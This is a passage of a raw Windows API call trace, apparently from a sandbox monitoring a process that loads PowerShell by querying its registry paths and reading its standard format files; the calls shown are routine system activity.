Protect=0x4, Type=0x20000)) returned 0x1c [0151.335] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.335] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.335] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.335] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.337] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.337] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.340] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.342] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.348] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e86c | out: phkResult=0x12e86c*=0x350) returned 0x0 [0151.348] RegQueryValueExW (in: hKey=0x350, lpValueName="path", lpReserved=0x0, lpType=0x12e8d4, lpData=0x0, lpcbData=0x12e8d0*=0x0 | out: lpType=0x12e8d4*=0x1, lpData=0x0, lpcbData=0x12e8d0*=0x74) returned 0x0 [0151.348] RegQueryValueExW (in: hKey=0x350, lpValueName="path", lpReserved=0x0, lpType=0x12e8b4, lpData=0x0, lpcbData=0x12e8b0*=0x0 | out: lpType=0x12e8b4*=0x1, lpData=0x0, lpcbData=0x12e8b0*=0x74) returned 0x0 [0151.348] RegQueryValueExW (in: hKey=0x350, lpValueName="path", lpReserved=0x0, lpType=0x12e8b4, lpData=0x509ca8, lpcbData=0x12e8b0*=0x74 | out: lpType=0x12e8b4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12e8b0*=0x74) returned 0x0 [0151.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12e434, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0151.348] GetLastError () returned 0xcb [0151.348] SetErrorMode (uMode=0x1) returned 0x1 [0151.349] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12e8b4 | out: lpFileInformation=0x12e8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0151.349] GetLastError () returned 0xcb [0151.349] SetErrorMode (uMode=0x1) returned 0x1 [0151.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.350] GetLastError () returned 0xcb [0151.350] SetErrorMode (uMode=0x1) returned 0x1 [0151.351] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0151.351] GetLastError () returned 0xcb [0151.351] SetErrorMode (uMode=0x1) returned 0x1 [0151.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.351] GetLastError () returned 0xcb [0151.351] SetErrorMode (uMode=0x1) returned 0x1 [0151.351] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0151.351] GetLastError () returned 0xcb [0151.351] SetErrorMode (uMode=0x1) returned 0x1 [0151.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.351] GetLastError () returned 0xcb [0151.351] SetErrorMode (uMode=0x1) returned 0x1 [0151.351] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0151.351] GetLastError () returned 0xcb [0151.351] SetErrorMode (uMode=0x1) returned 0x1 [0151.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.351] GetLastError () returned 0xcb [0151.351] SetErrorMode (uMode=0x1) returned 0x1 [0151.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0151.352] GetLastError () returned 0xcb [0151.352] SetErrorMode (uMode=0x1) returned 0x1 [0151.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0151.352] GetLastError () returned 0xcb [0151.352] SetErrorMode (uMode=0x1) returned 0x1 [0151.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0151.352] GetLastError () returned 0xcb [0151.352] SetErrorMode (uMode=0x1) returned 0x1 [0151.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0151.352] GetLastError () returned 0xcb [0151.352] SetErrorMode (uMode=0x1) returned 0x1 [0151.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0151.353] GetLastError () returned 0xcb [0151.353] SetErrorMode (uMode=0x1) returned 0x1 [0151.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0151.353] GetLastError () returned 0xcb [0151.353] SetErrorMode (uMode=0x1) returned 0x1 [0151.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0151.353] GetLastError () returned 0xcb [0151.353] SetErrorMode (uMode=0x1) returned 0x1 [0151.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0151.353] GetLastError () returned 0xcb [0151.353] SetErrorMode (uMode=0x1) returned 0x1 [0151.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0151.353] GetLastError () returned 0xcb [0151.353] SetErrorMode (uMode=0x1) returned 0x1 [0151.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0151.354] GetLastError () returned 0xcb [0151.354] SetErrorMode (uMode=0x1) returned 0x1 [0151.354] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12e8a8 | out: lpFileInformation=0x12e8a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0151.354] GetLastError () returned 0xcb [0151.354] SetErrorMode (uMode=0x1) returned 0x1 [0151.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.355] GetLastError () returned 0xcb [0151.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.369] GetLastError () returned 0xcb [0151.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.369] GetLastError () returned 0xcb [0151.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.373] GetLastError () returned 0xcb [0151.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.374] GetLastError () returned 0xcb [0151.374] SetErrorMode (uMode=0x1) returned 0x1 [0151.374] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0151.374] GetLastError () returned 0x0 [0151.374] GetFileType (hFile=0x328) returned 0x1 [0151.374] SetErrorMode (uMode=0x1) returned 0x1 [0151.374] GetFileType (hFile=0x328) returned 0x1 [0151.374] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.393] GetLastError () returned 0x0 [0151.395] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.395] GetLastError () returned 0x0 [0151.395] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.395] GetLastError () returned 0x0 [0151.395] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.395] GetLastError () returned 0x0 [0151.396] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.396] GetLastError () returned 0x0 [0151.396] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.396] GetLastError () returned 0x0 [0151.396] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x9e2, lpOverlapped=0x0) returned 1 [0151.396] GetLastError () returned 0x0 [0151.396] ReadFile (in: hFile=0x328, lpBuffer=0x2f3ce46, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3ce46*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.396] GetLastError () returned 0x0 [0151.396] ReadFile (in: hFile=0x328, lpBuffer=0x2f3d8c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f3d8c4*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.396] GetLastError () returned 0x0 [0151.396] CloseHandle (hObject=0x328) returned 1 [0151.396] GetLastError () returned 0x0 [0151.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e284, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.396] GetLastError () returned 0x0 [0151.396] SetErrorMode (uMode=0x1) returned 0x1 [0151.397] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f4e980 | out: lpFileInformation=0x2f4e980*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0151.397] GetLastError () returned 0x0 [0151.397] SetErrorMode (uMode=0x1) returned 0x1 [0151.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.397] GetLastError () returned 0x0 [0151.397] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x328) returned 0x0 [0151.397] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.397] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.397] RegCloseKey (hKey=0x328) returned 0x0 [0151.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.397] GetLastError () returned 0x0 [0151.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.398] GetLastError () returned 0x0 [0151.465] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x9abb70b2, Data2=0x513, Data3=0x4c9e, Data4=([0]=0xa4, [1]=0xa6, [2]=0x4c, [3]=0x56, [4]=0xf2, [5]=0x3b, [6]=0xf8, [7]=0x39))) returned 0x0 [0151.504] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xe13670ae, Data2=0xdb56, Data3=0x4b23, Data4=([0]=0xba, [1]=0xa1, [2]=0xa6, [3]=0x66, [4]=0x35, [5]=0x0, [6]=0x5d, [7]=0xcf))) returned 0x0 [0151.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.505] GetLastError () returned 0x0 [0151.506] SetErrorMode (uMode=0x1) returned 0x1 [0151.506] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0151.506] GetLastError () returned 0x0 [0151.506] GetFileType (hFile=0x328) returned 0x1 [0151.506] SetErrorMode (uMode=0x1) returned 0x1 [0151.506] GetFileType (hFile=0x328) returned 0x1 [0151.506] ReadFile (in: hFile=0x328, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.517] GetLastError () returned 0x0 [0151.518] ReadFile (in: hFile=0x328, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.518] GetLastError () returned 0x0 [0151.518] ReadFile (in: hFile=0x328, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.518] GetLastError () returned 0x0 [0151.519] ReadFile (in: hFile=0x328, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.519] GetLastError () returned 0x0 [0151.519] ReadFile (in: hFile=0x328, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.519] GetLastError () returned 0x0 [0151.520] ReadFile (in: hFile=0x328, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x12e724*=0xfb2, lpOverlapped=0x0) returned 1 [0151.520] GetLastError () returned 0x0 [0151.520] ReadFile (in: hFile=0x328, lpBuffer=0x2f613ba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f613ba*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.520] GetLastError () returned 0x0 [0151.520] ReadFile (in: hFile=0x328, lpBuffer=0x2f61c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2f61c68*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.520] GetLastError () returned 0x0 [0151.520] CloseHandle (hObject=0x328) returned 1 [0151.520] GetLastError () returned 0x0 [0151.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e284, lpFilePart=0x0 | out: 